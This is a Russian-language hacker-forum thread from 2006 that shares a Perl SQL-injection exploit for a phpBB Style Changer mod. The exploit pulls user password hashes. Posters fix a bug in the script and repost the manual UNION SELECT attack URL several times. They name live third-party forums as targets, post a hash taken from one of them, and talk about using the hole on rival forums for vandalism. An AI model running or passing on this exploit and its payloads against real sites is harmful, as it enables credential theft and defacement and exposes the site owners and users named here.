Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   phpBB 2.0.19 Exploit (https://forum.antichat.xyz/showthread.php?t=14055)

m0nzt3r 06.02.2006 13:53
phpBB 2.0.19 Exploit
 
Окуеть уже до 19 дошли...
собственно вот линк _http://www.milw0rm.com/id.php?id=1469
а вот код
Код:
#!/usr/bin/perl
#########################################################
#                _______ _______ ______                #
#                |______ |______ |    \                #
#                ______| |______ |_____/                #
#                                                        #
#phpBB Style Changer/Demo Mod-->GET HASH EXPLOIT        #
#Created By SkOd                                        #
#SED security Team                                      #
#http://www.sed-team.be                                #
#skod.uk@gmail.com                                      #
#ISRAEL                                                #
#########################################################
#google:
#"Powered by phpBB" inurl:"index.php?s" OR inurl:"index.php?style"
#########################################################
use IO::Socket;
if (@ARGV < 3){
print q{
############################################################
#  phpBB Style Changer\Viewer MOD SQL injection Exploit  #
#                Tested on phpBB 2.0.19                          #
#            created By SkOd. SED Security Team            #
############################################################
        bbstyle.pl [HOST] [PATH] [Target id]
        bbstyle.pl www.host.com /phpbb2/ 2
############################################################
};
exit;
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$id = $ARGV[2];
print "[+]Make Connection\n";
$serv =~ s/(http:\/\/)//eg;
$path = $dir.'index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id='.$id.'/*';
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-]Connect Failed\r\n";
print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "[+]Connected\n";
while ($hash = <$socket>){
$hash =~ m/open(.*?)template/ && print "[+]User id: $id\n[+]Md5 Hash: $1\n";
}

# milw0rm.com [2006-02-05]

Troxy 06.02.2006 14:31
shto ta nefuric4it kak nado


C:\>c:\perl\bin\perl.exe c:\bb2.pl http://******* /forums/ 2
[+]Make Connection
[+]Connected


i sjo poslje etovo

Desr0w 06.02.2006 14:49
у кого пахало?Я около 15 пробовал не пашет пока

k1b0rg 06.02.2006 14:59
Я незнаю как сплоит, я вручную все делал, работает на ура, у кого руки растут от ушей посвещаеться вот вам форум бажный
http://www.phpbbhacks.com/templatesdemo/
http://www.extremepixels.net/phpbb/
да и ваще их полно в гугле, монстр респект

D1mOn 06.02.2006 15:24
да вручную всё прекрасно работает!)))

limpompo 06.02.2006 15:52
Работает на все 100% =)

max_pain89 06.02.2006 16:40
У кого не работает, вы из форума копировали сплойт?

D1mOn 06.02.2006 16:42
да)))

limpompo 06.02.2006 16:47
Ошибка В Exploit-е есть =)) Ну что парни кто не любит в Ручную ищите Ошибку в Скрипте =))

+toxa+ 06.02.2006 17:02
Всё работает на ура, всё нормально

k1b0rg 06.02.2006 17:14
о спасибо лимпопо, действительно ошибка =)))
вот быстренько исправил, у кого руки не из задницы поймут

while ($hash = <$socket>){
$hash =~ m/open(.*?)template/ ;
$pass=$1;
}
print "[+]User id: $id\n[+]Md5 Hash: $pass\n";

limpompo 06.02.2006 17:26
Рабочая верcия Выглядит так!
perl phpbb19.pl http://www.extremepixels.net /phpbb/
[+]Make Connection
[+]Connected
[+]User id: 2
[+]Md5 Hash: 12d187897ee09aa0900af90c29f0936c


Вуаля =))

Otaku 06.02.2006 18:33
Вручную юзается хорошо. Но не везде работает=(
На многих форумах ничего не происходит=(

limpompo 06.02.2006 18:43
Значит пропатчины или Другая версия phpbb

Otaku 06.02.2006 19:00
Видимо...
Но тестил на локал хосте. Версия 100% 2.0.19.
Ничего не происходит. Никакие патчи вроде не ставлены. Версия оригинальная.
На приведённых в топике форумах всё работает.
Хм... Странновато малость. Или я ламмерю?

max_pain89 06.02.2006 19:11
ошибка же не в форуме а в моде

Jonathan Allen 06.02.2006 20:05
Люди, скажите пожалуйста, как его запустить на перле? У меня установлен ActivePerl 5.8.3

D1mOn 06.02.2006 20:08
имхо, юзайте вручную, запарили ныть уже)))

limpompo 06.02.2006 20:09
zaivi d cmd -> i napishi perl lalala.pl

DRON-ANARCHY 06.02.2006 20:32
Вручную проще! Работает классно.
А он тока на 19 работает?

D1mOn 06.02.2006 20:36
Dron-anarchy походу тока на 19!а жаль)))

m0nzt3r 06.02.2006 21:32
ну а вам какая разница нах?=)) тем более на многих стоит 19)) да действительно там ошыпка имхо могли бы и из линка взять тоже мине ) и за репу многим спасиБо+)

karapuz 06.02.2006 22:11
сорри скиньте в пм линк на бажный форум, для теста... :rolleyes:

D1mOn 06.02.2006 22:14
Код:
index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null  ,null,null,null,null,null,null,null,null,null,null  ,null,null,null,null,null,null,null,null,null,null  ,null,null,null,null,null,null,null,null,null,null  ,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id=2/*
Вот это вручную!!!

Rebz 06.02.2006 22:34
причём, уберите пробелы лишние в запросе, когда писать его будете! Fr Om - это From! =)

karapuz 06.02.2006 22:44
все разобрался спасибо, но форумов маловато =(

Inferno 06.02.2006 23:51
За сплойт спасибки ручками юзается на отлично :d
Только реально я нарыл токо пару форумов которые ломаются а остальные никак!

limpompo 07.02.2006 00:45
Inferno - Значит версии Другии =)) Рузами всегда хорошо работаеться =)) Чем бажными Скриптами =))

Tikson 07.02.2006 01:41
m0nzt3r спасибо за исправление ошибки)

syntacsis 07.02.2006 01:55
Это не работает на стандартном 2.0.19 Только с бажной модификацией. Это уязвимость не версии форума а мода. А дырявые моды для phpbb есть и другие. Фотоальбом Коппермайна например (тоже не обновленный) и др. Но это всё редко встречается

Inferno 07.02.2006 02:04
Цитата:
Сообщение от syntacsis
Это не работает на стандартном 2.0.19 Только с бажной модификацией. Это уязвимость не версии форума а мода. А дырявые моды для phpbb есть и другие. Фотоальбом Коппермайна например (тоже не обновленный) и др. Но это всё редко встречается
Реально я уже перерыл больше сотни и токо на 2х работает эта бага!

Nova 07.02.2006 02:06
Цитата:
Сообщение от syntacsis
Это не работает на стандартном 2.0.19 Только с бажной модификацией. Это уязвимость не версии форума а мода. А дырявые моды для phpbb есть и другие. Фотоальбом Коппермайна например (тоже не обновленный) и др. Но это всё редко встречается
Это я слепой или ты ????
где ты здесь мод увидел ????

Может быть разные релизы phpBB 2.0.19 к примеру там за другой месяц или ещё что-то там но никак не уязвимость модов....

У меня трёт аж на ура....

madman 07.02.2006 02:14
Редкая кнешна бага, но всё ж работает. Молоца.

syntacsis 07.02.2006 02:54
Цитата:
Сообщение от Nova
Это я слепой или ты ????
не я

Цитата:
Сообщение от Nova
где ты здесь мод увидел ????
А в сплоите по-русски написано:
phpBB Style Changer/Demo Mod-->GET HASH EXPLOIT :)
Вот он и работает только там, где этот стайл ченджер установлен

Otaku 07.02.2006 06:43
Врубился уже.
Мало где это стоит=(

D4rkness 07.02.2006 13:04
Попробывал , с исправлением сплойта от K1borg'а , пишет
[+]Make Connection
[+]Connected
[+]User id: 2
[+]Md5 Hash: пусто .
Почему может быть ? Пробую на http://forum.sfaction.net , или на http://allgsm.com.ru/forum/ , не на одном не прет .

ViPYC 07.02.2006 14:51
Цитата:
Сообщение от D4rkness
Попробывал , с исправлением сплойта от K1borg'а , пишет
[+]Make Connection
[+]Connected
[+]User id: 2
[+]Md5 Hash: пусто .
Почему может быть ? Пробую на http://forum.sfaction.net , или на http://allgsm.com.ru/forum/ , не на одном не прет .
Ну тебе же русским языком объяснили и разжевали, что сплоит работает на форумах где стоит бажный мод Style Changer\Viewer
Для справки: этот мод позволяет менять скин для форума прямо с главной страницы не заходя в настройки профиля.

А вообще, как уже предлагали выше, пользуйся вручную
Код HTML:
http://somesite/someforum/index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null%20%20%20%20,null,null,null,null,null,null,null,null,null,null%20%20%20%20,null,null,null,null,null,null,null,null,null,null%20%20%20%20,null,null,null,null,null,null,null,null,null,null%20%20%20%20,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id=2/*
Где последняя цифра в коде - это Id пользователя, сейчас там стоит 2

Так что enjoy ;)

Fraerok 07.02.2006 15:02
Блин жаль что не везде работает! Покачто ещё не 1 форума не нашёл где стоит эта шляпа! :rolleyes:

Desr0w 07.02.2006 15:13
Да уж не самый удачный сплойт для пхпбб,кста вышла новая пага-всем СМОТРЕТЬ
Думаю,что для неприятельского форума самое,то.Да и дырка будет еше долго жить)

Otaku 07.02.2006 15:39
Интересный сплойт. Но только для вандализма =(.
Кроме мести ничего интересного.


Время: 10:47
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице